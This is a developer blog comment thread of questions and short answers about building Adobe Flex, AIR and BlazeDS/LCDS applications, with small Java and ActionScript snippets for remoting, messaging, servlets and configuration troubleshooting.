Now I don’t know what the problem is: no matter what, even if there is no exception, I get debug messages in the handleFault method of the MXML. I never hit the handleResult case.
I am not sure why. How would I handle this if success redirects to a different MXML and error shows the message from the DB?
I would appreciate it if you could point me to some example.
2. Second question: I have two list boxes in my MXML. I want to add, add all, remove, and remove all values between the two list boxes. Is there any example for that too?
Thanks
Hi Chandu,
org.w3c.dom.Document objects from Java are converted to the XML class type by default. You can also send a String from Java and convert that to XML using XML(yourXmlString).
Hope this helps.
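A minimal sketch of a remoting method returning a Document (the class and element names are hypothetical):

import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class CatalogService
{
    // the returned org.w3c.dom.Document arrives on the Flex side as the XML type
    public Document getCatalog() throws Exception
    {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder().newDocument();
        Element root = doc.createElement("catalog");
        Element item = doc.createElement("item");
        item.setTextContent("sample");
        root.appendChild(item);
        doc.appendChild(root);
        return doc;
    }
}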
Hi Nikhil,
Try doPost method in your Servlet.
Hope this helps
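FileReference.upload() issues a multipart/form-data POST, so, assuming the rest of Nikhil's servlet stays the same, a minimal fix is to add a handler like:

protected void doPost(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException
{
    // FileReference.upload() sends a POST, so delegate to the parsing code above
    doGet(request, response);
}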
Hi Raj,
You don’t have access to the session or request in Flash. You will have to write code on your server which will get the data for you. How exactly is the flow? Are you using Struts?
Thanks, Sujith. I am not using Struts; I use Java Page Flow, which is similar to Struts. Now that we don’t have session or request objects on the client, changing the whole JSP application to Flash is a lot of work.
Hi Sujit Reddy, sorry, I don’t speak English well. I have a question…
Is it possible to retrieve data from a MySQL database into a Flex application with LCDS and Data Management Services, but without having a Flex client notify all the other clients? That is, can LCDS detect changes in the database automatically (for example, if you enter data into the database from the MySQL console) and update the view in the Flex client with the Data Management Service, not AMFPolling?
Hi Suji,
This is Ashok. I downloaded your Gmail contact retrieve project. Your project only runs in AIR, but I converted it to run in a web browser and I am not able to retrieve Gmail contacts. Please give me an idea of what I can do.
hi sujit,
I am facing the problem below when loading a module using ModuleLoader. Can you please suggest where I might be wrong?
Thanks indeed.
TypeError: Error #1009: Cannot access a property or method of a null object reference.
at mx.containers::Panel/layoutChrome()
at mx.core::Container/updateDisplayList()
at mx.containers::Panel/updateDisplayList()
at mx.core::UIComponent/validateDisplayList()
at mx.core::Container()
Can you please say what the key differences between these three classes are:
1.SWFLoader
2.ModuleLoader
3.ModuleManager
Thanks
hi Sujit,
I am trying to create Flex portlets in RAD and configure them in WebSphere Portal Server 6.0.
1) I know how to create a JSP portlet in Portal Server; to create a Flex portlet, is there a need for the Flex plugin in RAD, as per the PDF below, which uses FlexTagLib in the JSP?
2) How do I configure a Flex portlet in Portal Server with BlazeDS to invoke a Java method using RemoteObject? This is much different from BlazeDS with Tomcat.
Maybe if BlazeDS is configured properly in Portal Server, then Flex can invoke Java methods the same as in Tomcat.
Please reply soon.
Hi Sujit,
Could you tell me how to bind a DateField with a DataGrid in BlazeDS?
Hi Sujith,
Can you provide a simple example of writing and dispatching custom events in AS3?
Regards
-Chandu
Hi Sujit, I need to send an ActionScript object to a servlet and return the object in CSV format. Could you please share some sample code on how to pass the AS object to the servlet and how to receive the AS object in the servlet?
Hi Sujit,
I vaguely remember some real AVM-level tutorial PDFs from long back (Jan 2007). I was searching for them of late and couldn’t find them. They deal with the memory management model of Flex and the three-frame execution of a Flex application. Do you have any idea where they can be found? I am also looking for an in-depth discussion of the Flex/Flash rendering mechanism and memory model (threading and event based). Please let me know if you have come across them.
Thank you
Regards
Ravi
hi Sujit,
I want to create and save a folder on my machine using a Flex application. Can I do this with SharedObjects?
Thank you
Hi,
I have a problem using BlazeDS. I have a big application in Flex using remoting with BlazeDS. That works fine, but my MessageBroker crashes sometimes while my application is running, and after that, calls to BlazeDS don’t work anymore.
It happens after many calls (sometimes 200, sometimes more than 1000…).
I tried to use many channels instead of only one; no result.
Is it a limitation of Blaze? Thanks.
Hi Mike,
Hope this helps.
Hi Ashok,
Yes, that might not work in a web application because Google doesn’t have a crossdomain.xml file defined.
Hope this helps.
Hi Selva,
Looks like some property is null, can you please share code to reproduce this?
Hi Vasu,
Never tried this, but configuring BlazeDS properly and making sure your Flex based portlet is sending requests to BlazeDS should get it working. Please check out the articles at the URLs below.
Hope this helps.
Hi Shilpa,
What exactly do you want to do? Which property of the DateField do you want to bind to which property of the DataGrid? Can you please explain?
Hi Sujit, thanks, that’s what I needed :D. In fact it was working well; the problem was not within the class but in invoking the server. Thanks 😀
Hi Chandu,
// listen for it somewhere with addEventListener("EventType", handler);
var e:Event = new Event("EventType");
dispatchEvent(e);
Hope this helps.
Hi Prakash,
Please check out the URL below.
Hope this helps.
Hi Ravi,
Please check out the URLs below.
Hope this helps.
Hi Jzy,
Sharing error messages from the Flex application or from the server logs will help in finding out what might be going wrong.
Hi Sujit,
I am trying to pass the elements of my dynamic list from Flex to a JSP.
Can you tell me how that can be done?
Hi Nidhi,
Please try sending them as comma-separated values or key/value pairs using HTTPService.
Hope this helps.
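For example, a minimal sketch of the servlet side (the parameter name is hypothetical, assuming the Flex app sends items=a,b,c):

import javax.servlet.http.HttpServletRequest;

public class ListParamHelper
{
    // splits a comma-separated request parameter back into its elements
    public static String[] readItems(HttpServletRequest request)
    {
        String items = request.getParameter("items");
        return (items == null) ? new String[0] : items.split(",");
    }
}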
hi sujit,
I am using resourceManager.loadResourceModule(resourceModuleURL); to load my messages property files in my main application. I am also using modules in my application.
In the modules I am not using the tag below:
[ResourceBundle("messages")]
But still my application correctly loads the messages from the messages.properties file. If so, what is the purpose of this metadata tag?
Thanks indeed. Can you please clarify that?
Hi Sujit,
Thanks.. That helped.. 🙂
Hi Sujit,
Is it possible to read from a DataGrid if it is empty? If yes, then how? I tried many ways but it doesn’t work.
IE7 with HTTPS under cross domain throws the following error: Security error accessing url” faultCode=”Channel.Security.Error”. A link identified this issue as an IE bug that can be circumvented by using one of the following HTTP header parameters:
Cache-Control: no-store
Cache-Control: no-store, must-revalidate
Cache-Control: no-store, must-revalidate, max-age=0
Cache-Control: must-revalidate
Cache-Control: max-age=0
Do you have any insight?
Hi Sujit,
1) I made a portal project in RAD using a simple “Hello” Flex application (i.e. used the generated SWF file) and am able to view the Flex application properly in the portal server.
2) If I use the RemoteObject tag in the Flex application, I make the MessageBrokerServlet entry in web.xml for the remoting connection. In the same project I created a Java class and made the corresponding entry in remoting-config.xml.
My questions:
1) By referring to the SWF file in a JSP through WebSphere Portal Server, is it possible to invoke the Java object using remoting, if both are deployed in the same WAR file?
2) While creating the Flex project, where should I point, i.e., Root folder, Root URL, Context Root? Because I am using WebSphere Portal Server.
Regarding “creating BlazeDS channels at runtime”: I think it talks about configuring the channels in the Flex application without making entries in remoting-config.xml.
thanks in advance.
Hi Sujit, this is a very useful website. Question:
We are trying to slowly integrate Flex 3 into an existing web app. We plan on adding the Flex client into iFrames where appropriate. The problem that I’m addressing is how to integrate a mixed J2EE/Flex client into a single web app on the server. For the Blaze side we want to hit java classes via destinations.
The web.xml file contains a login-config which forwards to a .jsp login form (we’re using FORM auth-method). When the BlazeDS url-mapping is added to security-constraints, any RemoteObject calls will hit this login-config servlet. That’s OK. We know it’s requesting the Blaze servlet and can try to respond accordingly (i.e. not returning the HTML logon form).
I tried returning an AMF3 object back to the client (a string that said “noAuth”) but the Flex client had no clue and spewed a “BadVersion” error. I was hoping to have the client recognize some kinda specific String/error so that it could prompt the client to logon (say, in the event of a session timeout while in the Flex portion of our app). I also prefer to avoid creating my authentication via Blaze as both my J2EE client and Flex app are sharing the same session and thus the same timeouts and other settings.
This seems like a good strategy but I just can’t figure-out how to make it apply. If this isn’t a good strategy do you have any suggestions given this issue? Certainly we can’t be the only Java shop trying to slowly migrate Flex into our web applications. Thanks.
-Doug
Hi Sujith,
My task is as follows:
a) I have an AdvancedDataGrid, and I have to render icons and labels coming from the server. The icon data from the server comes as a byte array. So I created an image renderer which has an HBox, and to the HBox I added an Image class and a Label object. I am able to see the icon and text as expected.
Now, when the user clicks on the cell, I want a ComboBox to drop down with choices which again show the icon and text.
b) So I created a new class extending ComboBox and created another image renderer, which is the itemRenderer for the ComboBox. The dataProvider is an array of strings; in the image renderer, based on the “data” property, I set the Image and Label in the renderer.
c) Now I set the itemEditor to the above custom ComboBox.
All of the above works fine to a certain extent. However, whenever I click the cell, the cell changes to a drop-down list and starts showing the “string” from the array which was the dataProvider for the ComboBox; when I click the cell again, the drop-down list opens and I see the icons and text. I want to avoid showing the “text” part when I just click the cell.
Hope I was able to explain clearly. If you have an example or a reference to some material on how I can achieve this, I will be grateful.
Regards
-Chandu
Hello,
We are trying to build a high-definition PDF (300 dpi, for book printing) from pages designed in a Flex tool (like scrapblog.com).
The Flash is included in a web site written in Java/J2EE, so the PDF generation will take place on the Java server (based on a description of the pages sent by the Flex tool with BlazeDS).
We need 300 dpi definition and the ability to build the PDF without any template (since the user will be able to change the layout of the pages he wants to print; the description sent by the Flash tool includes the location, orientation and source of all the elements on each page).
From what we have seen up to now, the lack of a template can be difficult to handle with Java libraries.
Any idea how such a PDF can be built in Java? Or, lacking that, with other languages (such as PHP) which could be added on the server side?
Thanks for your help.
Hi sujith,
How do I open a browser window from an AIR application? It is throwing a sandbox exception:
SecurityError: Error #2121: Security sandbox violation: navigateToURL: app:/demo.swf cannot access about:blank. This may be worked around by calling Security.allowDomain.
I need to open all http, https, … URLs.
Thanks
Sharath
Hi Nidhi,
Access the dataProvider property of the DataGrid.
Hi Ragvendra,
I think this is an IE bug and this solution should help.
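A minimal sketch of a servlet filter that adds one of those headers (the filter name and the chosen value are assumptions):

import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletResponse;

public class IeCacheControlFilter implements Filter
{
    public void init(FilterConfig config) {}

    public void destroy() {}

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException
    {
        // one of the Cache-Control values listed above
        ((HttpServletResponse) res).setHeader("Cache-Control", "no-store, must-revalidate");
        chain.doFilter(req, res);
    }
}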
Hi Vasu,
You need not set the root folder, please visit the URLs below for more details.
Hope this helps.
Hi Doug,
Please check this article
Hope this helps.
Hi Sujit,
I have been trying to set up a custom wrapper in JSP for my Flex application so I can get some header variables, but I am getting errors in passing the flashVars. Can you please recommend the best way to do this?
Thanks,
Karunya
Hi Sujit ,
Below is a very simple Flex app containing the main screen with a Button (main.mxml) and a Form-based component located under src/components.
I would like to know how to use the Button to display the Form component when clicking on it; the method that I added to the button is: click="showForm()".
Thank you very much
Main.mxml
Hi Sujit,
It seems my previous post is incomplete … I’ll try again .
Thanks
main.mxml
////////////////////////////
…..
mx:Button x="246" y="242" label="Button" click="showForm()"
… etc
////////////////////////////
<services>
    <service-include file-path="remoting-config.xml" />
    <service-include file-path="proxy-config.xml" />
    <service-include file-path="messaging-config.xml" />
</services>
From the MXML application the remote object method works properly, but RemoteObject gives an error when called from within a Module.
Is it possible or not? Can you give me some clarification regarding this?
thanks
Dhanya
Hey Sujit,
First of all, thanks in advance for any help you could bring to me. I really appreciate your time on this.
Now, I’m working with charts. Right now I’m facing a problem with the labels on the chart. My client is asking me to solve the issue that comes up when the label is too big and the graphic (BarSeries) too short, so the label appears as “…”. Yes, we do have the tooltip, but those graphics are also exported as PDF files, and they require the graphic information to be on the report. So I thought there might be a way to specify the labelLocation property on the BarSeries dynamically.
My problem is that I’m not really a Flex programmer; I had been focused on Java, but the client asked me to create this project as a Flex + Java + Oracle interaction. So…
Do you think there is a way to create that dynamic position?
Also, on the same project, and taking advantage of your knowledge: I’m exporting to PDF and Excel, but right now I’m using a JSP page to call the exportation. The way I’m exporting to PDF is using AlivePDF; no problem there, because that API allows me to add images, so there I add the chart object. The problem comes up when I try to export an image to the Excel file.
I just started to read about the as3xls project on Google Code. But if you have some sample that I can use, it would be wonderful!
Once again, thanks and thanks and thanks in advance.
I’ll be waiting on your answers!!
Have a gr8 day!
Mike
Hi Sujit,
I am new to BlazeDS and have a few concerns regarding multithreading in the context of remote objects. Currently, who takes care of the multithreading issues (like those handled by the Tomcat servlet container) when the destination invokes the Java object through the adapter for the given destination?
Hello Sujith,
Hope you remember me. Could you please help me with export-to-Excel functionality? How do I export a DataGrid to Excel?
Thanks,.
Jayakumar Aravind
Hello Sujith,
I am facing problems with the Adobe AIR version. I had AIR 1.0 and have updated it to 1.5.1, but it is still installed in the 1.0 folder.
When I create a new Flex project it shows that Adobe AIR version 1.0 is used.
My major concern is that I want to use the Text Layout Framework, and its minimum requirement is 1.5.
Please reply ASAP.
Hi Sujith,
I am using the BlazeDS-Tomcat integrated version. Whenever I run my Flex application it creates a new session for BlazeDS in Tomcat. The number of sessions for BlazeDS does not increase above 22 (seen in the Tomcat Manager). If I run my application for the 23rd time, my application says it is out of memory.
Can you suggest a solution for increasing the number of sessions?
Thanks in advance, and awaiting your reply at the earliest,
Shyam Sundar.A
Please send me the link to download blazedsMonster.
Hi Neeraj,
Please download from this URL
Hi Sujit,
I am new to Flex. I am exploring Flex and BlazeDS capabilities. My requirement is like this:
I have my plain Java object on Server A and a Flex application deployed on Server B, and I need to invoke the Java object running on Server A from the Flex client application which is deployed on Server B. Is this possible to do with a BlazeDS web application?
Please note that retrieving data from the DB via the same code works perfectly fine…
Need some help!!! Yes, some stuff is missing, but I can add it if need be. Clarity, and making sure I didn’t overload the page, was the reason for not including everything…
thx in advance…
My Error is:
[RPC Fault faultString=”Channel disconnected” faultCode=”Client.Error.DeliveryInDoubt” faultDetail=”Channel disconnected before an acknowledgement was received”]
.
.
.
Here is my Code:
VO – PHP
VO – AS3
Service:
MXML:
OK… so I have narrowed it down to this:
1. my variable data does get recognized through the “tunnel”; Flex debug says so
2. I am able to insert “something” (garbage) into the DB
3. I need to find out the correct string for the insert syntax with Flex, ZendAMF and PHP
4. the data that the DB gets is:
depending on my DB schema I get more or fewer characters
What is the correct syntax for the $query = sprintf(" blah ????? insert statement?

Hello Sir,
I want to open a URL on click of an item.
Also please advise me: is it possible to hide components such as Panel and other components, and show them on a particular event occurrence?
Please help me
Thank you
Hello Sir,
A small correction to the previous post: I want to show an alert message on click of an item.
Also please advise me: is it possible to hide components such as Panel and other components, and show them on a particular event occurrence?
Please help me
Thank you
Hi Sujith,
I found lot of useful posts in your blog. I am looking for some help in developing a Flex Project.
Here’s my requirement:
A dashboard needs to be displayed with data from a MySQL database which gets updated every 10 min. That is, my dashboard charts have to be refreshed every 10 min. Please suggest how to start this project. Any hints/sample code is highly appreciated.
Thanks,
Mona.
contd..
I am planning to use Java as the backend and the JBoss server to deploy my application. A step-by-step walkthrough would be very helpful. Looking forward to your reply.
Thanks,
Mona.
Hi Ganesh,
Please check the visible property of the Flex controls and modules in Flex.
Hi Mona,
Couple of options
1. Data Management feature in LCDS has this and more implemented. If you can use LCDS, then go for it.
2. Have a timer and send a request to the server to get the modified data
3. Use one of the polling channels in BlazeDS Messaging service and get the modified data
Useful articles
Hope this helps.
Hi Sujit,
How can I put BlazeDS, MySQL and Flex together?
Is there any way?
Please help
Prachi
Hi Prachi,
You should have a Java class which communicates with MySQL. Flex should communicate with the Java class using remoting in BlazeDS. Please check the articles at the URL below.
Hope this helps.
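For example, a minimal sketch of such a Java class (expose it as a destination in remoting-config.xml and call it from a Flex RemoteObject; the JDBC URL, credentials and table are assumptions):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class ProductDAO
{
    public List<String> getProductNames() throws Exception
    {
        List<String> names = new ArrayList<String>();
        Class.forName("com.mysql.jdbc.Driver"); // MySQL JDBC driver jar in WEB-INF/lib
        Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/test", "user", "password");
        try
        {
            Statement st = con.createStatement();
            ResultSet rs = st.executeQuery("SELECT name FROM products");
            while (rs.next())
            {
                names.add(rs.getString("name"));
            }
        }
        finally
        {
            con.close();
        }
        return names;
    }
}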
Hi Sujith,
Thanks for the reply. I am unable to configure JBoss server as target runtime in Flex Builder.
I am getting this error:
Missing classpath entry \your_server_root\appservers\jboss\bin\run.jar
I have seen a lot of posts similar to this error but could not find a solution.
-Mona
Sujith,
A simple application demonstrating interaction between Flex, Java and MySQL would be very helpful. Please post if you have such applications.
Thanks.
I have tried using a Java class for connecting BlazeDS to MySQL but am still facing the problem.
Can you please put together a simple app which demonstrates the interaction between Flex, Java and MySQL? It will be really very helpful.
Will your Blazemonster utility work with LCDS as well? Thanks.
Have you used Blazemonster with the Swiz framework? If so can you write a blog entry indicating how the two work together? This would seem to be a very time-saving combination but I’m not yet sure how it would work, being new to Flex.
Sujit,
Is there a way to display a PDF in a Flex web app like the PDFs displayed on acrobat.com? We don’t want to use iFrames. Please reply…
Hi Sujit,
In Flex, is it possible to mash up other sites’ components, i.e. gadgets, in my Flex program (or in an Accordion)?
It can be things like news / chat / currency codes / exchange rates, etc.
If possible, point me to links with examples (Flex examples).
Thanks in Advance,
Regards,
Srini.
HI Sujit,
I have posted one query on the user group. Can you quickly take a look and provide your input?
It is about using HTTPService to send a POST request to an https URL.
Nilesh
Hi Sujit,
Could you explain to me the clear picture of the lifecycle methods of an application, as well as the child creation process, with an example?
Hi Phil,
Yes it will work, please let me know if you face any problem.
Thanks.
Hi Mahesh,
I don't think this is possible as of now.
Hope this helps.
Hi Srinivas,
It is definitely possible: just consume the services you want using WebService or HTTPService components and display them in your Flex application; a sketch follows.
Hope this helps.
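As a sketch, consuming a hypothetical external feed with HTTPService (the URL is an assumption; the remote host must allow access via crossdomain.xml, or you route the call through a proxy):

    import mx.rpc.events.ResultEvent;
    import mx.rpc.http.HTTPService;

    private function loadFeed():void
    {
        var svc:HTTPService = new HTTPService();
        svc.url = "http://example.com/news/rss"; // assumed feed URL
        svc.resultFormat = "e4x";
        svc.addEventListener(ResultEvent.RESULT, onFeed);
        svc.send();
    }

    private function onFeed(event:ResultEvent):void
    {
        var feed:XML = event.result as XML;
        // Bind feed.channel.item (or similar) to a List inside the Accordion.
    }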
Hi Sujit,
I want to create a page with Adobe Flex where several users can log in to the same session,
for example to chat or to see each other via webcam.
How can I realize this?
The page is already working, but every user has a separate session…
Can you give me a hint?
best regards
tobi
Hi Sujith,
I am trying to run the example using Flex 4 and BlazeDS.
I receive this error when I press the button:
[MessagingError message='Destination 'CreatingRpc' either does not exist or the destination has no channels defined (and the application does not define any default channels.)']
What is the source of this problem?
How can it be debugged?
Thanks
Hi Sujit,
I am using the Google Calendar API created by you. I am facing two problems while using it:
1. First, if I try to delete an event I get this error:
ArgumentError: Error #2008: Parameter method must be one of the accepted values.
Debugging gave me some idea that it comes from:
urlRequest.method = "DELETE";
Any idea how to rectify it?
2. The second error is when I try to get events in a given date range. The problem is that the date gets converted to UTC format in your API, and if I try to get events for a single day, I get results for 2 days.
I would appreciate it if you could help me out.
Thanks
Hi Sujit!
I hope you will answer my question.
I am doing a project which combines Flex, Stomp and ActiveMQ. How can I send a message from the Flex client to an ActiveMQ topic? I imported as3-stomp already. What other packages must I import?
Thanks!
– chary –
Hello to all,
I am programming with Adobe Flex and I am getting an error message. Please help me.
Hi Sujit,
I keep getting this error in LCDS:
"HttpSession to FlexSession map not created in message broker"
I have clustered my LCDS server (on TomcatB) with another Tomcat server (TomcatA).
What am I doing wrong?
Thanks.
Hi Sujit,
I want to integrate Flex and BlazeDS with my Struts framework using remote objects.
I am able to get the parameters from the Flex client as arguments to my remote method.
But earlier I was using forms to get these parameters, and I used that form object in many places to update my application. How can this be achieved in Flex?
It would be of great help if you could reply with a sample application integrating Struts with Flex and BlazeDS.
Thanks in advance,
Lalit.
I want to integrate a MathML editor in a Flex application.
I have seen the Google code which uses JavaScript, HTML and mylib.swc. I tried the same code along with the swf file and loaded that swf from a URL.
Hi,
I just want to ask whether it is possible to create an XML file and save my form data in Flex or AIR?
Hi Sujit,
Can you please tell me how I can access Java methods from an Adobe AIR application?
Hi Sujit,
As per my understanding, Flex does not support the Map data type (HashMap/Map), so I wrote the class below to use a Map in my application.
The problem I am facing is that I am not able to bind my map to the 'currentState' property of a Canvas. The class extends ArrayCollection, but I still face issues with binding.
My Map class, which extends ArrayCollection:
package com.util
{
    import mx.collections.ArrayCollection;

    public class Map extends ArrayCollection
    {
        // Maps each key to the index of its value in the collection.
        private var keyNames:Object = new Object();

        public function Map()
        {
            super();
        }

        public function put(key:String, value:Object):void
        {
            if (keyNames.hasOwnProperty(key))
            {
                // Key already present: overwrite the stored value in place.
                setItemAt(value, keyNames[key]);
            }
            else
            {
                // New key: remember the index, then append the value.
                keyNames[key] = this.length;
                addItem(value);
            }
        }

        public function getValue(key:String):Object
        {
            return getItemAt(keyNames[key]);
        }
    }
}
My MXML:
It would be of great help to me if you could post a solution.
Thanks
Prashanth
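For reference, a usage sketch of the Map class above (the state objects are hypothetical). Note that binding directly to an expression like map.getValue("key") will not update automatically, since Flex binding watches properties rather than method calls; binding to an intermediate [Bindable] variable and reassigning it when the map changes is one workaround:

    var states:Map = new Map();
    states.put("home", homeState);   // homeState is assumed
    states.put("admin", adminState); // adminState is assumed

    [Bindable]
    public var current:Object;       // bind currentState="{current}" to this

    current = states.getValue("home"); // reassign to trigger the binding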
Hi Sujit,
Thanks for all the great postings.
Could you please provide an example of data paging in Flash Builder 4 with Java?
Thanks
Hi,
I am trying to load a file that is local on my computer.
I am receiving the following error:
SecurityError: Error #2148: SWF file cannot access local resource. Only local-with-filesystem and trusted local SWF files may access local resources.
at flash.net::URLStream/load()
I tried adding the compiler option -use-network=false but it didn't help.
I am using Flex 4.
I also added the file and its directory to the trusted list.
Can you help with that?
Thanks
Dear Sujit,
I have created an RIA using Flex 3 and WebORB PHP. It runs successfully on MAMP on Mac using localhost. But how do I deploy this to my hosted website? There's nothing to be found on how to set up WebORB PHP on a hosted website. Could you give me some hints regarding this issue? Btw, I am using the Community Edition. I would be very glad.
Hi Sujit,
I am using Flex 3 and BlazeDS for web application development. I have the following questions, and any help is appreciated.
1. Do we have to do any session handling in a Flex-based web app?
2. Can you please explain how to handle the server session expiry event on the client side and display the login page?
Thanks
I have ActionScript classes to parse MathML but I don't know how to access them using HTML and JavaScript. I want to send XML data and get back the parsed math equation. Please help.
Hi Sujit,
I want to create a simple application which requires a database at the backend. I am using Flex Builder 3 to make the application. Can you please suggest a light backend database for this? Is it possible to use MS Access?
Thanks in advance.
Pooja
Hi Sujit,
If I point the root folder to -app root-/lcds-sample/ (I have appropriate destinations configured in data-management-config.xml), I am able to get the data from my own backend. If I point the root folder to -app root-/myapplication/, I get a "No destination…" error even though I have the proper destination configured.
Thanks in advance,
Rao
Hi Sujit,
I need help from you regarding server console printing. I am using BlazeDS remoting to call server-side Java classes, and everything works fine. I have deployed my application on a JBoss server. Whenever I call the remote classes, a few things get printed on the server console. I have checked my application, and I am not using any System.out.println inside the Java classes. I want to stop that information being printed on the server console. Please help me with this.
Thanks in advance,
Ravi
Hi Sujith,
I am having a problem with my application. I am connecting Flex to Struts to MySQL. It hangs after 3-4 records are added to the database, and I am not able to tell whether it is a Java problem, a Tomcat problem or a Flex problem. Please help me in this regard; waiting for your reply. You can send it to my personal mail id too.
Please, it's urgent.
Hi, I need information on a Flex HTTP request.
I don't want to hard-code the URL in the HTTPService tag,
so I am configuring it in the proxy-config.xml file.
I am unable to communicate through this file. I am using BlazeDS.
Let me know if you have any ideas.
MessagingError message='Destination 'ProxyRequest' either does not exist or the destination has no channels defined (and the application does not define any default channels.)']" faultCode="InvokeFailed" faultDetail="Couldn't establish a connection to 'ProxyRequest'
Getting this error…
Hi, I am using BlazeDS with Tomcat,
making an HTTP service request from the Flex client.
I have configured the destination in the proxy-config.xml file:
/{context.root}/test
The error I get on submit is: [RPC Fault faultString="[MessagingError message='Destination 'ProxyRequest' either does not exist or the destination has no channels defined (and the application does not define any default channels.)']" faultCode="InvokeFailed" faultDetail="Couldn't establish a connection to 'ProxyRequest'"]
at mx.rpc::AbstractInvoker/[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\AbstractInvoker.as:263]
at mx.rpc.http.mxml::HTTPService/[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\mxml\HTTPService.as:249]
at mx.rpc.http::HTTPService/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\HTTPService.as:767]
at mx.rpc.http.mxml::HTTPService/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\mxml\HTTPService.as:232]
at FlexHttpServiceDemo/___FlexHttpServiceDemo_Button1_click()[E:\home\isms\eclipseWorkSpace\FlexHttpServiceDemo\src\FlexHttpServiceDemo.mxml:24]
Hi Tobi,
You can try the Messaging service in BlazeDS/LCDS, or try one of the options below.
Hope this helps.
Hi ishai,
This might be because either the destination doesn't have a channel defined or the Flex application was not recompiled after configuring the channel. You can check the channel used by the RemoteObject by putting a breakpoint and inspecting the RemoteObject instance; a runtime ChannelSet sketch follows.
Hope this helps.
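If the channel has to be supplied at runtime (so the swf does not depend on a compiled-in services-config.xml), a sketch using the destination id from the post above; the endpoint URL and channel id are assumptions that must match the server's services-config.xml:

    import mx.messaging.ChannelSet;
    import mx.messaging.channels.AMFChannel;
    import mx.rpc.remoting.RemoteObject;

    private function createService():RemoteObject
    {
        var cs:ChannelSet = new ChannelSet();
        cs.addChannel(new AMFChannel("my-amf",
            "http://localhost:8400/samples/messagebroker/amf")); // assumed URL
        var ro:RemoteObject = new RemoteObject("CreatingRpc");
        ro.channelSet = cs;
        return ro;
    }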
Hi Rahul,
Which Flex SDK are you using ?
Hi Jose,
What's the message you are getting?
Hi Lalit,
Please check the articles below.
Hope this helps.
Hi Richard,
Yes, definitely. Please see if this article helps
Hi Sachin,
Please check this article
Hope this helps.
Hi Prashanth,
Did you send out same question to Vyshak ? If yes, I replied to your email.
Hope that helped.
Hi Vimal,
I will try posting that, but it's the same as PHP except that the code on the server is written in Java. Please try and see if you can get it working.
Hi ishai,
Please change the output folder/launch URL to launch it from the local file system rather than from the server; a swf loaded from a server cannot access the local file system.
Hi Tobias,
You should change the endpoint URLs in your services-config.xml file to point to your hosted website, and the Flex application has to be recompiled with the updated services-config.xml. That change should be sufficient to deploy.
Hope this helps.
Hi Cham,
You can find details on how to manage session using Remoting at this URL
In case of the session expiring, you should write code which checks whether the session has expired and lets your Flex application know about it. You can also handle the same on the client. Please find details at this URL
Hope this helps
Hi Kanti,
Please check if this helps
Hi Pooja,
You can use a database of your choice as long as there are drivers to communicate with it. I would choose MySQL over MS Access 🙂
Hope this helps.
Hi Rao,
Can you please share the data-management-config.xml and the web.xml? If you can also share the Flash Builder error logs, that will help. Thanks.
Hi Ravi,
Please change the log settings in services-config.xml
Hope this helps.
Hi Raja,
Where is this proxy-config.xml file ?
Hi Raja,
Please make sure you have recompiled your Flex application after changing the proxy-config.xml file. To be safe, run the clean command on your Flex project.
Hope this helps.
I have been battling with this problem for the last few days, so I could really do with some help 🙂
I have a Flex 3 app using BlazeDS to receive messages pushed from a web app on a Tomcat server. The app on the server is working fine and I can see things working as I expect. I consistently get the error message "The Destination ["alarm-event-feed"] either does not exist or the destination has no channels defined" when I try to run the Flex 3 app.
I've attached the config files from the Tomcat server. Can anyone help?
I am using the Flex HTTP service with useProxy=true, destination="destination"…
Hi Sujit,
I have gone through your "Building Flex application for BlazeDS Remoting destinations using Flash Builder 4". I have created destinations but I still cannot see any destinations listed in the BlazeDS wizard (in DCD), although I am able to access the destination using a RemoteObject call. Can you please help me out?
Also, while connecting to BlazeDS it asks for the Tomcat username and password; even if I give a wrong password it allows me in. Is there a problem in Tomcat?
Thanks
Vijay Kumar J
Hi,
I am working on Flex-Spring integration.
In Flex I am using HTTPService.
Please let me know the configuration for the application-config.xml file in Spring to make the Flex-Spring integration work.
Hi, I am able to use PHP to access my locally created DB and view the data, but I have a SQL Server in the USA and now want to view that data, i.e. bind it and see it.
I am able to connect in Excel using connect-database, giving the database name, which looks like this:
usaicf.usa.website.com\sql2005
I have the username and password and know the table name.
If I use usaicf.usa.website.com\sql2005 in Excel I get the query data, but if I do the same in Flash Builder 4 it throws an error which says it could not connect, no such host is known. The same server does connect through Excel. Please help me.
It's through a VPN network.
We are looking at outsourcing the development of some RIA components. Can you recommend some of the top players in RIA and Flex development in India?
Thank you
David
Hi,
I am using the MessageBroker code to send a message from Java to the client. It works perfectly when the application and the BlazeDS server run in the same Tomcat instance, but if I change the BlazeDS server, the message sent from Java is not received by the client. Any help would be fine.
Thanks
Hi Vijay,
Can you please send me the remoting-config.xml file, a screenshot of the destinations window in FB4 and the FB4 error log? Regarding the destination being accessible even when you enter a wrong username/password: are you using custom or basic authentication? Also please make sure your authentication logic is fine.
Hope this helps.
Hi Suman,
Please check out article at this URL
Hope this helps.
Hi Suresh,
Please check article at this URL
Hope this helps.
Hi David,
Please see if this link helps. If you cannot find any kindly let me know.
Hi Kaushal,
As long as the Java class sending the message and BlazeDS are in the same Tomcat instance, this should work. Can you please check whether plain messaging, with a Flex application as the message producer, works fine? A sketch of that check follows.
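A minimal producer/consumer pair for that check, with an assumed destination id; if this round-trip works, the destination and channels are fine and the problem is on the Java side:

    import mx.messaging.Consumer;
    import mx.messaging.Producer;
    import mx.messaging.events.MessageEvent;
    import mx.messaging.messages.AsyncMessage;

    private var producer:Producer = new Producer();
    private var consumer:Consumer = new Consumer();

    private function initMessaging():void
    {
        producer.destination = "chat"; // assumed destination id
        consumer.destination = "chat";
        consumer.addEventListener(MessageEvent.MESSAGE, onMessage);
        consumer.subscribe();
    }

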